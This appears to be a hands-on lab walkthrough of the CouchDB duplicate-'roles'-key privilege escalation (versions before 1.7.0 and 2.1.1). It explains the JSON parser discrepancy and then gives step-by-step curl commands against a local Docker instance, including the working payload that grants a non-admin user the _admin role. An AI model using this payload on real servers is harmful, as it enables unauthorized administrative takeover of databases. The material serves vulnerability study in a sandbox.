- Apache CouchDB is a document-oriented NoSQL database, implemented in Erlang.
- Due to the discrepancy between the Erlang-based JSON parser and JavaScript-based JSON parser, there was a vulnerability in CouchDB before 1.7.0 and 2.x before 2.1.1 allowing non-admin users to escalate privilege by submitting _users documents with duplicate roles keys used for access control within the databases, including the special case_admin role, that denotes administrative users.
To recap, the vulnerability allows non-admin users to give themselves admin privileges. - CouchDB uses special database (called _users by default) to store information about registered users. This is a system database – this means that while it shares common database API, there are some special security-related constraints applied and used agreements on documents structure.
Only administrators may GET, PUT or DELETE any document in_users database.
Users may only access (GET /_users/org.couchdb.user:<username>) or modify (PUT /_users/org.couchdb.user:<username>) documents that they owns.
-
Run docker image:
docker container run -d --name couchdb-sandbox -p 5984:5984 couchdb:1.6.1
-
Check sure the CouchDB instance is launched and working
curl -X GET http://localhost:5984
-
Query: All databases in the instance
curl -X GET http://localhost:5984/_all_dbs
-
Query: Create an admin account with credentials admin:admin
curl -X PUT http://localhost:5984/_config/admins/admin -d '"admin"'
-
Query: Try create a new database named records
curl -X PUT http://localhost:5984/records
We cant create because dont have admin account -
Query: Create a new database named records with admin authentication
curl -X PUT http://admin:admin@localhost:5984/records
-
Query: Create a new document in _users database
curl -X PUT http://localhost:5984/_users/org.couchdb.user:guest \ -H "Accept: application/json" \ -H "Content-Type: application/json" \ -d '{"name": "guest", "password": "guest", "roles": ["_admin"], "type": "user"}'
We cant create an account with admin role
-
Query: Create a new document in _users database with admin role
curl -X PUT http://localhost:5984/_users/org.couchdb.user:guest \ -H "Accept: application/json" \ -H "Content-Type: application/json" \ -d '{"name": "guest", "password": "guest", "roles": ["_admin"], "roles": [], "type": "user"}'
we have an admin account now!
-
Query: Create a new database named new_recorDs with guest authentication
curl -X PUT http://guest:guest@localhost:5984/new_records
-
Query: Delete the database named new_records with guest authentication
curl -X DELETE http://guest:guest@localhost:5984/new_records